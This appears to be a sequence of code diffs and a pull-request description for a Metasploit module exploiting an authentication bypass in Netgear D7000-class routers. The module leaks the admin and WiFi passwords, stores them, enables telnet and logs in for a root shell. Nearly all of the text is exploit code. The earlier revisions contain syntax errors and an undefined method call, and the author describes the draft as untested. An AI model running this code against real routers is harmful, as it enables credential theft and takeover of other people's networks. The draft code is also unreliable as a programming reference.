+            'Stability' => [ CRASH_SERVICE_DOWN ]
+          },
+          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
+          'DisclosureDate' => '2021-09-06',
+          'DefaultTarget' => 0
+        )
+      )
+      register_options(
+        [
+          Opt::RPORT(8080)
+        ]
+      )
+    end
+
+    def retrieve_firmware_version
+      res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
+      if res.nil?
+        return Exploit::CheckCode::Unknown('Connection timed out.')
+      end
+
+      data = res.to_s
+      firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
+      if firmware_version.nil?
+        return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
+      end
+
+      firmware_version
+    end
+
+    def check
+      target_version = retrieve_version
+      print_status("Target is running firmware version #{target_version}")
+      if (target_version >= Rex::Version.new('1.2.0.0')) && (target_version < Rex::Version.new('1.2.0.88'))
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.0.1.0')) && (target_version < Rex::Version.new('1.0.1.80'))
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
+        return Exploit::CheckCode::Appears
+      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
+        return Exploit::CheckCode::Appears
+      else
+        return Exploit::CheckCode::Safe
+      end
+    end
+
+
+    def run
+      res = send_request_cgi({
+        'uri' => '/',
+        'method' => 'GET'
+      })
+      unless res.headers['WWW-Authenticate'] =~ /Netgear/:
+        fail_with(Failure::NoTarget, 'Target does not appear to be a Netgear router!')
+      end
+
+      res = send_request_cgi({
+        'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList'
+        'method' => 'GET'
+      })
+
+      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
+        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
+      end
+      username = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
+
+      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
+        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin password in its response!')
+      end
+      password = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
+
+      if username.empty? || password.empty?
+        fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
+      end
+
+      print_good("Can log into target router using username #{username} and password #{password}")
+      print_status("Attempting to retrieve /top.html to verify we are logged in!")
+
+      res = send_request_cgi({
+        'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList'
+        'method' => 'GET',
+        'authorization' => basic_auth(username, password)
+      })
+
+      unless /<div id=\"firm_version\"><span languageCode = \"[0-9]+\">Firmware Version<\/span><br \/>([^\n]+)/.match(res.text)
+        fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?'
+      end
+
+      print_good("Successfully logged into target router using the stolen credentials!")
+    end
+  end

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
     end
     wifi_password = leaked_info_array[0]
-    wifi_password_5G = leaked_info_array[1]
+    wifi_password_5g = leaked_info_array[1]
     username = leaked_info_array[2]
     password = leaked_info_array[3]
 
@@ -156,7 +156,7 @@ class MetasploitModule < Msf::Auxiliary
     if html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()').empty?
       fail_with(Failure::UnexpectedReply, 'Application did not respond with an 5G SSID in its response!')
     else
-      wifi_ssid_5G = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()').text
+      wifi_ssid_5g = html_response.xpath('//div[@id="network_name_5G"]/following-sibling::div/child::text()').text
     end
 
     if username.empty? || password.empty?
@@ -165,14 +165,13 @@ class MetasploitModule < Msf::Auxiliary
 
     print_good("Can log into target router using username #{username} and password #{password}")
 
-    if wifi_ssid_5G.empty? || wifi_password_5G.empty?
-      print_warning("5G SSID information contained blank strings, information might be invalid!")
+    if wifi_ssid_5g.empty? || wifi_password_5g.empty?
+      print_warning('5G SSID information contained blank strings, information might be invalid!')
     end
 
     if wifi_ssid.empty? || wifi_password.empty?
-      print_warning("5G SSID information contained blank strings, information might be invalid!")
+      print_warning('5G SSID information contained blank strings, information might be invalid!')
     end
-
 
     print_status('Attempting to retrieve /top.html to verify we are logged in!')
 
@@ -240,7 +239,6 @@ class MetasploitModule < Msf::Auxiliary
 
     create_credential_login(login_data)
 
-
     print_status('Enabling telnet on the target router...')
     res = send_request_cgi(
       'uri' => '/setup.cgi',
@@ -259,12 +257,12 @@ class MetasploitModule < Msf::Auxiliary
     unless /Debug Enable!/.match(res&.body) # Since this is a one liner response, we don't use XPath searches here and instead resort to a plain regex match.
       fail_with(Failure::UnexpectedReply, 'Target did not enable debug mode for some reason!')
     end
-    print_good("Telnet enabled on target router!")
+    print_good('Telnet enabled on target router!')
     handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
     handler.datastore['RHOSTS'] = datastore['RHOST']
     file_handle = File.open('netgear_pnpx_wordlist.txt', 'w')
     file_handle.write("#{username} #{password}")
-    file_handle.close()
+    file_handle.close
     handler.datastore['USERPASS_FILE'] = 'netgear_pnpx_wordlist.txt'
     print_status("Attempting to log in with #{username}:#{password}. You should get a new telnet session as the root user")
     handler.run

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -4,135 +4,134 @@
 ##
 
 class MetasploitModule < Msf::Auxiliary
-    include Msf::Exploit::Remote::HttpClient
-    include Msf::Auxiliary::Report
-    prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  prepend Msf::Exploit::Remote::AutoCheck
 
-    def initialize(info = {})
-      super(
-        update_info(
-          info,
-          'Name' => 'Netgear PNPX_GetShareFolderList Authentication Bypass',
-          'Description' => %q{
-            This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
-            running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows
-            unauthenticated attackers to reveal the password for the admin user that is used to log into the
-            router's administrative portal, in plaintext.
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Netgear PNPX_GetShareFolderList Authentication Bypass',
+        'Description' => %q{
+          This module targets an authentication bypass vulnerability in the mini_http binary of several Netgear Routers
+          running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The vulnerability allows
+          unauthenticated attackers to reveal the password for the admin user that is used to log into the
+          router's administrative portal, in plaintext.
 
-            Once the password has been been obtained, attackers can use the exploit/linux/telnet/netgear_telnetenable module
-            to send a special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
-            then log into this telnet server using the new password, and obtain a shell as the "root" user.
+          Once the password has been been obtained, attackers can use the exploit/linux/telnet/netgear_telnetenable module
+          to send a special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can
+          then log into this telnet server using the new password, and obtain a shell as the "root" user.
 
-            This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
-          },
-          'License' => MSF_LICENSE,
-          'Author' => [
-            'Unknown', # Vulnerability discovery and PoC creation.
-            'Grant Willcox' # Metasploit Module
-          ],
-          'References' => [
-            [ 'URL', 'https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133' ],
-            [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
-          ],
-          'Notes' => {
-            'SideEffects' => [ CONFIG_CHANGES ],
-            'Stability' => [ CRASH_SERVICE_DOWN ]
-          },
-          'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
-          'DisclosureDate' => '2021-09-06',
-          'DefaultTarget' => 0
-        )
+          This vulnerability was discovered and exploited by an independent security researcher who reported it to SSD.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Unknown', # Vulnerability discovery and PoC creation.
+          'Grant Willcox' # Metasploit Module
+        ],
+        'References' => [
+          [ 'URL', 'https://kb.netgear.com/000063961/Security-Advisory-for-Authentication-Bypass-Vulnerability-on-the-D7000-and-Some-Routers-PSV-2021-0133' ],
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
+        ],
+        'Notes' => {
+          'SideEffects' => [ CONFIG_CHANGES ],
+          'Stability' => [ CRASH_SERVICE_DOWN ]
+        },
+        'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
+        'DisclosureDate' => '2021-09-06',
+        'DefaultTarget' => 0
       )
-      register_options(
-        [
-          Opt::RPORT(8080)
-        ]
-      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080)
+      ]
+    )
+  end
+
+  def retrieve_firmware_version
+    res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
+    if res.nil?
+      return Exploit::CheckCode::Unknown('Connection timed out.')
     end
 
-    def retrieve_firmware_version
-      res = send_request_cgi({ 'uri' => '/currentsetting.htm' })
-      if res.nil?
-        return Exploit::CheckCode::Unknown('Connection timed out.')
-      end
-
-      data = res.to_s
-      firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
-      if firmware_version.nil?
-        return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
-      end
-
-      firmware_version
+    data = res.to_s
+    firmware_version = data.match(/Firmware=V(\d+\.\d+\.\d+\.\d+)(_(\d+\.\d+\.\d+))?/)
+    if firmware_version.nil?
+      return Exploit::CheckCode::Unknown('Could not retrieve firmware version!')
     end
 
-    def check
-      target_version = retrieve_version
-      print_status("Target is running firmware version #{target_version}")
-      if (target_version >= Rex::Version.new('1.2.0.0')) && (target_version < Rex::Version.new('1.2.0.88'))
-        return Exploit::CheckCode::Appears
-      elsif (target_version >= Rex::Version.new('1.0.1.0')) && (target_version < Rex::Version.new('1.0.1.80'))
-        return Exploit::CheckCode::Appears
-      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
-        return Exploit::CheckCode::Appears
-      elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
-        return Exploit::CheckCode::Appears
-      else
-        return Exploit::CheckCode::Safe
-      end
-    end
+    firmware_version
+  end
 
-
-    def run
-      res = send_request_cgi({
-        'uri' => '/',
-        'method' => 'GET'
-      })
-      unless res.headers['WWW-Authenticate'] =~ /Netgear/:
-        fail_with(Failure::NoTarget, 'Target does not appear to be a Netgear router!')
-      end
-
-      res = send_request_cgi({
-        'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList'
-        'method' => 'GET'
-      })
-
-      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
-        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
-      end
-      username = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">Admin user Name<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
-
-      unless /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)
-        fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin password in its response!')
-      end
-      password = /<DIV class=left_div id=passpharse><span languageCode = \"[0-9]+\">New Admin password<\/span>: <\/DIV>\s*<DIV class=right_div>([^<]+)<\/DIV>/.match(res.text)[0]
-
-      if username.empty? || password.empty?
-        fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
-      end
-
-      print_good("Can log into target router using username #{username} and password #{password}")
-      print_status("Attempting to retrieve /top.html to verify we are logged in!")
-
-      res = send_request_cgi({
-        'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList'
-        'method' => 'GET',
-        'authorization' => basic_auth(username, password)
-      })
-
-      unless /<div id=\"firm_version\"><span languageCode = \"[0-9]+\">Firmware Version<\/span><br \/>([^\n]+)/.match(res.text)
-        fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?'
-      end
-
-      print_good("Successfully logged into target router using the stolen credentials!")
-      print_status("Storing credentials for future use...")
-      report_cred(
-        ip: datastore['RHOST']
-        port: datastore['RPORT']
-        service_name: 'http'
-        user: username,
-        password: password,
-        proto: 'tcp',
-        type: 'password'
-      )
+  def check
+    target_version = retrieve_version
+    print_status("Target is running firmware version #{target_version}")
+    if (target_version >= Rex::Version.new('1.2.0.0')) && (target_version < Rex::Version.new('1.2.0.88'))
+      return Exploit::CheckCode::Appears
+    elsif (target_version >= Rex::Version.new('1.0.1.0')) && (target_version < Rex::Version.new('1.0.1.80'))
+      return Exploit::CheckCode::Appears
+    elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.110')) # Need more work on this as this isn't a good check for affected versions and may overlap with patched versions.
+      return Exploit::CheckCode::Appears
+    elsif (target_version >= Rex::Version.new('1.1.0.0')) && (target_version < Rex::Version.new('1.1.0.84')) # Need more work on this to make sure we apply this to the correct systems.
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
     end
   end
+
+  def run
+    res = send_request_cgi(
+      'uri' => '/',
+      'method' => 'GET'
+    )
+    unless res.headers['WWW-Authenticate'] =~ /Netgear/
+      fail_with(Failure::NoTarget, 'Target does not appear to be a Netgear router!')
+    end
+
+    res = send_request_cgi(
+      'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList',
+      'method' => 'GET'
+    )
+
+    unless %r{<DIV class=left_div id=passpharse><span languageCode = "[0-9]+">Admin user Name</span>: </DIV>\s*<DIV class=right_div>([^<]+)</DIV>}.match(res.text)
+      fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin username in its response!')
+    end
+    username = %r{<DIV class=left_div id=passpharse><span languageCode = "[0-9]+">Admin user Name</span>: </DIV>\s*<DIV class=right_div>([^<]+)</DIV>}.match(res.text)[0]
+
+    unless %r{<DIV class=left_div id=passpharse><span languageCode = "[0-9]+">New Admin password</span>: </DIV>\s*<DIV class=right_div>([^<]+)</DIV>}.match(res.text)
+      fail_with(Failure::UnexpectedReply, 'Application did not respond with the expected admin password in its response!')
+    end
+    password = %r{<DIV class=left_div id=passpharse><span languageCode = "[0-9]+">New Admin password</span>: </DIV>\s*<DIV class=right_div>([^<]+)</DIV>}.match(res.text)[0]
+
+    if username.empty? || password.empty?
+      fail_with(Failure::UnexpectedReply, 'Application responded with expected content, but the matched content was an empty string for some reason!')
+    end
+
+    print_good("Can log into target router using username #{username} and password #{password}")
+    print_status('Attempting to retrieve /top.html to verify we are logged in!')
+
+    res = send_request_cgi(
+      'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList',
+      'method' => 'GET',
+      'authorization' => basic_auth(username, password)
+    )
+
+    unless %r{<div id="firm_version"><span languageCode = "[0-9]+">Firmware Version</span><br />([^\n]+)}.match(res.text)
+      fail_with(Failure::UnexpectedReply, 'The target router did not respond with a firmware version when /top.html was requested. Are we logged in?')
+    end
+
+    print_good('Successfully logged into target router using the stolen credentials!')
+    print_status('Storing credentials for future use...')
+    report_cred(
+      ip: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'http',
+      user: username,
+      password: password,
+      proto: 'tcp',
+      type: 'password'
+    )
+  end
+end

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -124,14 +124,33 @@ class MetasploitModule < Msf::Auxiliary
 
     print_good('Successfully logged into target router using the stolen credentials!')
     print_status('Storing credentials for future use...')
-    report_cred(
-      ip: datastore['RHOST'],
+
+    service_data = {
+      address: datastore['RHOST'],
       port: datastore['RPORT'],
       service_name: 'http',
-      user: username,
-      password: password,
-      proto: 'tcp',
-      type: 'password'
-    )
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      origin_type: :service,
+      private_data: password,
+      private_type: :password,
+      username: username
+    }
+
+    credential_data.merge!(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 end

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -91,7 +91,11 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     res = send_request_cgi(
-      'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList',
+      'uri' => '/setup.cgi'
+      'vars_get' => {
+        'next_file' => 'BRS_swisscom_success.html',
+        'x' => 'todo=PNPX_GetShareFolderList',
+      },
       'method' => 'GET'
     )
 

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -91,12 +91,12 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     res = send_request_cgi(
-      'uri' => '/setup.cgi'
+      'uri' => '/setup.cgi',
+      'method' => 'GET',
       'vars_get' => {
         'next_file' => 'BRS_swisscom_success.html',
-        'x' => 'todo=PNPX_GetShareFolderList',
-      },
-      'method' => 'GET'
+        'x' => 'todo=PNPX_GetShareFolderList'
+      }
     )
 
     unless %r{<DIV class=left_div id=passpharse><span languageCode = "[0-9]+">Admin user Name</span>: </DIV>\s*<DIV class=right_div>([^<]+)</DIV>}.match(res.text)
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Auxiliary
     print_status('Attempting to retrieve /top.html to verify we are logged in!')
 
     res = send_request_cgi(
-      'uri' => '/setup.cgi?next_file=BRS_swisscom_success.html&x=todo=PNPX_GetShareFolderList',
+      'uri' => '/top.html',
       'method' => 'GET',
       'authorization' => basic_auth(username, password)
     )
@@ -156,5 +156,15 @@ class MetasploitModule < Msf::Auxiliary
     }.merge(service_data)
 
     create_credential_login(login_data)
+
+    print_status("Enabling telnet on the target router")
+    res = send_request_cgi(
+      'uri' => '/setup.cgi',
+      'method' => 'GET',
+      'vars_get' => {
+        'todo' => 'debug'
+      },
+      'authorization' => basic_auth(username, password)
+    )
   end
 end

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Auxiliary
     include Msf::Exploit::Remote::HttpClient
+    include Msf::Auxiliary::Report
     prepend Msf::Exploit::Remote::AutoCheck
 
     def initialize(info = {})
@@ -26,7 +27,7 @@ class MetasploitModule < Msf::Auxiliary
           },
           'License' => MSF_LICENSE,
           'Author' => [
-            'Unknown independent researcher', # Vulnerability discovery and PoC creation.
+            'Unknown', # Vulnerability discovery and PoC creation.
             'Grant Willcox' # Metasploit Module
           ],
           'References' => [
@@ -123,5 +124,15 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       print_good("Successfully logged into target router using the stolen credentials!")
+      print_status("Storing credentials for future use...")
+      report_cred(
+        ip: datastore['RHOST']
+        port: datastore['RPORT']
+        service_name: 'http'
+        user: username,
+        password: password,
+        proto: 'tcp',
+        type: 'password'
+      )
     end
   end

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -35,8 +35,9 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/' ]
         ],
         'Notes' => {
-          'SideEffects' => [ CONFIG_CHANGES ],
-          'Stability' => [ CRASH_SERVICE_DOWN ]
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
         },
         'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell.
         'DisclosureDate' => '2021-09-06',
@@ -157,8 +158,8 @@ class MetasploitModule < Msf::Auxiliary
 
     create_credential_login(login_data)
 
-    print_status("Enabling telnet on the target router")
-    res = send_request_cgi(
+    print_status('Enabling telnet on the target router')
+    send_request_cgi(
       'uri' => '/setup.cgi',
       'method' => 'GET',
       'vars_get' => {

--- a/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass.rb
@@ -151,6 +151,7 @@ class MetasploitModule < Msf::Auxiliary
         module_fullname: fullname,
         workspace_id: myworkspace_id,
         filename: "wifi_#{wifi_ssid_5g}_creds.txt",
+        username: wifi_ssid_5g,
         private_data: wifi_password_5g,
         private_type: :password
       }
@@ -167,6 +168,7 @@ class MetasploitModule < Msf::Auxiliary
         module_fullname: fullname,
         workspace_id: myworkspace_id,
         filename: "wifi_#{wifi_ssid}_creds.txt",
+        username: wifi_ssid,
         private_data: wifi_password,
         private_type: :password
       }
@@ -239,11 +241,13 @@ class MetasploitModule < Msf::Auxiliary
     print_good('Telnet enabled on target router!')
     handler = framework.modules.create('auxiliary/scanner/telnet/telnet_login')
     handler.datastore['RHOSTS'] = datastore['RHOST']
+    File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Make sure the file is deleted if it already exists.
     file_handle = File.open('netgear_pnpx_wordlist.txt', 'wb')
     file_handle.write("#{username} #{password}")
     file_handle.close
     handler.datastore['USERPASS_FILE'] = 'netgear_pnpx_wordlist.txt'
     print_status("Attempting to log in with #{username}:#{password}. You should get a new telnet session as the root user")
     handler.run
+    File.delete('netgear_pnpx_wordlist.txt') if File.exist?('netgear_pnpx_wordlist.txt') # Remove the file once we are done.
   end
 end


### PR DESCRIPTION
This adds in a module for bypassing the authentication of Netgear D7000 and similar routers as described at https://ssd-disclosure.com/ssd-advisory-netgear-d7000-authentication-bypass/. Its still a work in progress though and the initial draft is very very rough and hasn't been tested yet. This is purely just to save the initial copy of this work until I have a proper testing environment to investigate further.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/admin/http/netgear_PNPX_GetShareFolderList_auth_bypass`
- [ ] Set RHOSTS and other settings as needed.
- [ ] `run`
- [ ] Check that it correctly identifies the target router version and if its vulnerable or not.
- [ ] Check that it successfully leaks the admin username and password.
